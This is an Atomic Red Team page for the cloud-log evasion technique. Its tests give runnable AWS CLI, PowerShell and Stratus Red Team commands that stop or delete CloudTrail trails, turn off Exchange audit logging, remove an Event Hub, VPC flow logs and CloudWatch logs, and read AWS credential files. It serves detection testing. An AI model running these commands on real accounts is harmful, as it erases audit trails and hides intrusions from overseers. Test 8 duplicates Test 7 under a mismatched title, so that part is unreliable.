Try it using Invoke-Atomic

Impair Defenses: Disable Cloud Logs

Description from ATT&CK

An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection.

Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)

Atomic Tests

Atomic Test #1 - AWS - CloudTrail Changes

Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail

Supported Platforms: iaas:aws

auto_generated_guid: 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e

Inputs:

Name Description Type Default Value
cloudtrail_name Name of the cloudTrail String redatomictesttrail
s3_bucket_name Name of the bucket String redatomic-test
region Name of the region String us-east-1

Attack Commands: Run with sh!

1
2
3
4
5
aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region}
aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name}  --is-multi-region-trail --region #{region}
aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}

Cleanup Commands:

1
2
aws s3 rb s3://#{s3_bucket_name} --force 

Dependencies: Run with sh!

Description: Check if ~/.aws/credentials file has a default stanza is configured

Check Prereq Commands:

1
2
3
4
cat ~/.aws/credentials | grep "default"
aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region}
aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json

Get Prereq Commands:

1
2
echo Please install the aws-cli and configure your AWS defult profile using: aws configure

Atomic Test #2 - Azure - Eventhub Deletion

Identifies an Event Hub deletion in Azure. An Event Hub is an event processing service that ingests and processes large volumes of events and data. An adversary may delete an Event Hub in an attempt to evade detection. https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about.

Supported Platforms: iaas:azure

auto_generated_guid: 5e09bed0-7d33-453b-9bf3-caea32bff719

Inputs:

Name Description Type Default Value
username Azure username String None
password Azure password String None
event_hub_name Name of the eventhub String test_eventhub
resource_group Name of the resource group String None
name_space_name Name of the NameSpace String None

Attack Commands: Run with powershell!

1
2
3
4
5
6
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-AzureAD -Credential $creds
New-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name}
Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}

Dependencies: Run with powershell!

Description: Install-Module -Name Az

Check Prereq Commands:

1
2
try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}

Get Prereq Commands:

1
2
Install-Module -Name AzureAD -Force

Atomic Test #3 - Office 365 - Exchange Audit Log Disabled

You can use the Exchange Management Shell to enable or disable mailbox audit logging for a mailbox. Unified or Admin Audit logs are disabled via the Exchange Powershell cmdline. https://github.com/Azure/Azure-Sentinel/blob/master/Detections/OfficeActivity/exchange_auditlogdisabled.yaml

Supported Platforms: office-365

auto_generated_guid: 1ee572f3-056c-4632-a7fc-7e7c42b1543c

Inputs:

Name Description Type Default Value
username office-365 username String None
password office-365 password String None

Attack Commands: Run with powershell!

1
2
3
4
5
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $False

Cleanup Commands:

1
2
3
4
5
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $True

Dependencies: Run with powershell!

Description: ExchangeOnlineManagement PowerShell module must be installed

Check Prereq Commands:

1
2
3
4
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}

Get Prereq Commands:

1
2
3
Install-Module -Name ExchangeOnlineManagement         
Import-Module ExchangeOnlineManagement

Atomic Test #4 - AWS - Disable CloudTrail Logging Through Event Selectors using Stratus

Update event selectors in AWS CloudTrail to disable the logging of certain management events to evade defense. This Atomic test leverages a tool called Stratus-Red-Team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-event-selectors/

Supported Platforms: linux,macos

auto_generated_guid: a27418de-bdce-4ebd-b655-38f11142bf0c

Inputs:

Name Description Type Default Value
stratus_path Path of stratus binary Path $PathToAtomicsFolder/T1562.008/src
aws_region AWS region to detonate String us-west-2

Attack Commands: Run with sh!

1
2
3
4
5
6
7
export AWS_REGION=#{aws_region} 
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-event-selectors
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-event-selectors --force

Cleanup Commands:

1
2
3
4
5
6
export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*

Dependencies: Run with sh!

Description: Stratus binary must be present at the (#{stratus_path}/stratus)

Check Prereq Commands:

1
2
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
3
4
5
6
7
8
9
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4) 
  wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
fi

Description: Check if ~/.aws/credentials file has a default stanza is configured

Check Prereq Commands:

1
2
cat ~/.aws/credentials | grep "default"

Get Prereq Commands:

1
2
echo Please install the aws-cli and configure your AWS defult profile using: aws configure

Atomic Test #5 - AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus

This Atomic test will use the Stratus Red Team will first setup a CloudTrail logging into an S3 bucket and will then make an API call to update the lifecycle rule on that S3 bucket with an expiration date of 1 day. This will essentially delete all the logs after one day. Adversaries often do this actiivity to evade detection. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/

Supported Platforms: linux,macos

auto_generated_guid: 22d89a2f-d475-4895-b2d4-68626d49c029

Inputs:

Name Description Type Default Value
stratus_path Path of stratus binary Path $PathToAtomicsFolder/T1562.008/src
aws_region AWS region to detonate String us-west-2

Attack Commands: Run with sh!

1
2
3
4
5
6
7
export AWS_REGION=#{aws_region} 
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-lifecycle-rule
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-lifecycle-rule --force

Cleanup Commands:

1
2
3
4
5
6
export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*

Dependencies: Run with sh!

Description: Stratus binary must be present at the (#{stratus_path}/stratus)

Check Prereq Commands:

1
2
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
3
4
5
6
7
8
9
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4) 
  wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
fi

Description: Check if ~/.aws/credentials file has a default stanza is configured

Check Prereq Commands:

1
2
cat ~/.aws/credentials | grep "default"

Get Prereq Commands:

1
2
echo Please install the aws-cli and configure your AWS defult profile using: aws configure

Atomic Test #6 - AWS - Remove VPC Flow Logs using Stratus

This Atomic will attempt to remove AWS VPC Flow Logs configuration. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.vpc-remove-flow-logs/

Supported Platforms: linux,macos

auto_generated_guid: 93c150f5-ad7b-4ee3-8992-df06dec2ac79

Inputs:

Name Description Type Default Value
stratus_path Path of stratus binary Path $PathToAtomicsFolder/T1562.008/src
aws_region AWS region to detonate String us-west-2

Attack Commands: Run with sh!

1
2
3
4
5
6
7
export AWS_REGION=#{aws_region} 
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.vpc-remove-flow-logs
echo "starting detonate"
./stratus detonate aws.defense-evasion.vpc-remove-flow-logs --force

Cleanup Commands:

1
2
3
4
5
6
export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*

Dependencies: Run with sh!

Description: Stratus binary must be present at the (#{stratus_path}/stratus)

Check Prereq Commands:

1
2
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
3
4
5
6
7
8
9
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4) 
  wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
fi

Description: Check if ~/.aws/credentials file has a default stanza is configured

Check Prereq Commands:

1
2
cat ~/.aws/credentials | grep "default"

Get Prereq Commands:

1
2
echo Please install the aws-cli and configure your AWS defult profile using: aws configure

Atomic Test #7 - AWS - CloudWatch Log Group Deletes

Creates a new cloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion

Supported Platforms: iaas:aws

auto_generated_guid: 89422c87-b57b-4a04-a8ca-802bb9d06121

Inputs:

Name Description Type Default Value
cloudwatch_log_group_name Name of the cloudWatch log group String log-test
region Name of the region String us-east-1

Attack Commands: Run with sh!

1
2
3
4
5
aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Created ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"

Dependencies: Run with sh!

Description: Check if ~/.aws/credentials file has a default stanza is configured

Check Prereq Commands:

1
2
cat ~/.aws/credentials | grep "default"

Get Prereq Commands:

1
2
echo Please install the aws-cli and configure your AWS defult profile using: aws configure

Atomic Test #8 - AWS - CloudWatch Log Stream Deletes

Creates a new CloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion

Supported Platforms: iaas:aws

auto_generated_guid: 89422c87-b57b-4a04-a12a-802bb11d06121

Inputs:

Name Description Type Default Value
cloudwatch_log_group_name Name of the cloudWatch log group String log-test
region Name of the region String us-east-1

Attack Commands: Run with sh!

1
2
3
4
5
aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Created ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"

Dependencies: Run with sh!

Description: Check if ~/.aws/credentials file has a default stanza is configured

Check Prereq Commands:

1
2
cat ~/.aws/credentials | grep "default"

Get Prereq Commands:

1
2
echo Please install the aws-cli and configure your AWS defult profile using: aws configure

Atomic Test #9 - AWS CloudWatch Log Stream Deletes

Creates a new cloudWatch log stream in AWS, Upon successful creation it will Delete the stream. Attackers can use this technique to evade defenses by deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html

Supported Platforms: iaas:aws

auto_generated_guid: 33ca84bc-4259-4943-bd36-4655dc420932

Inputs:

Name Description Type Default Value
cloudwatch_log_group_name Name of the cloudWatch log group String test-logs
cloudwatch_log_stream_name Name of the cloudWatch log stream String 20150601
region Name of the region String us-west-2

Attack Commands: Run with sh!

1
2
3
4
5
6
7
8
9
aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Created ***"
aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
echo "*** Log Stream Created ***"
aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
echo "*** Log Stream Deleted ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"

Dependencies: Run with sh!

Description: Check if ~/.aws/credentials file has a default stanza is configured

Check Prereq Commands:

1
2
cat ~/.aws/credentials | grep "default"

Get Prereq Commands:

1
2
echo Please install the aws-cli and configure your AWS defult profile using: aws configure

source